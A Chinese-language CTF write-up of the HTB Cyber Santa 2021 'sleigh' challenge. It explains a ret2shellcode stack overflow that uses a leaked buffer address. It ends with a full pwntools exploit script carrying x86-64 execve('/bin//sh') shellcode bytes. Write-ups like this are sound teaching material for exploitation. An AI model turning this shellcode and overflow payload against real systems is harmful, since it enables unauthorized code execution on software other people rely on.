ret2shellcode

控制程序去执行我们自己填充的代码。
条件:

  • 我们填充的代码的位置具有可执行权限

HTBCyberSanta 2021 sleigh

检查保护

CTF-栈溢出-基本ROP-【ret2shellcode】-LMLPHP
Has RWX segments提示有可读可写可执行的段

main函数
CTF-栈溢出-基本ROP-【ret2shellcode】-LMLPHP
banner函数:
CTF-栈溢出-基本ROP-【ret2shellcode】-LMLPHP

repair函数:

CTF-栈溢出-基本ROP-【ret2shellcode】-LMLPHP
这里read存在栈溢出,同时第一个fprintf输出了buf的地址

goodbye函数

CTF-栈溢出-基本ROP-【ret2shellcode】-LMLPHP
sleigh函数

CTF-栈溢出-基本ROP-【ret2shellcode】-LMLPHP

C 库函数 int atoi(const char *str) 把参数 str 所指向的字符串转换为一个整数(类型为 int 型)。

fprintf用法

#include <stdio.h>
#include <stdlib.h>

int main()
{
   FILE * fp;

   fp = fopen ("file.txt", "w+");
   fprintf(fp, "%s %s %s %d", "We", "are", "in", 2014);
   
   fclose(fp);
   
   return(0);
}

思路

栈溢出,同时栈上可执行,利用泄露的buf地址作为返回地址,同时将shellcode写入buf

shellcode一个不行就换下一个
shellcdoe
shellcode

接受字节‘0x ……’的处理,先化整型然后p64处理
CTF-栈溢出-基本ROP-【ret2shellcode】-LMLPHP

s.recvuntil(b" [")
leakVariable = p64(int(s.recvuntil(b"]")[:-1].decode(),16))//转换到八个字节的地址形式

exp

from pwn import *
context(os="linux",arch="amd64",log_level="debug")
shellcode =b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05"

s = process("./sleigh")
s.sendline(b"1")
s.recvuntil(b" [")
leakVariable = p64(int(s.recvuntil(b"]")[:-1].decode(),16))
payload = shellcode.ljust(72,b"A")
payload += leakVariable
s.sendline(payload)
s.interactive()
s.close()
11-17 09:23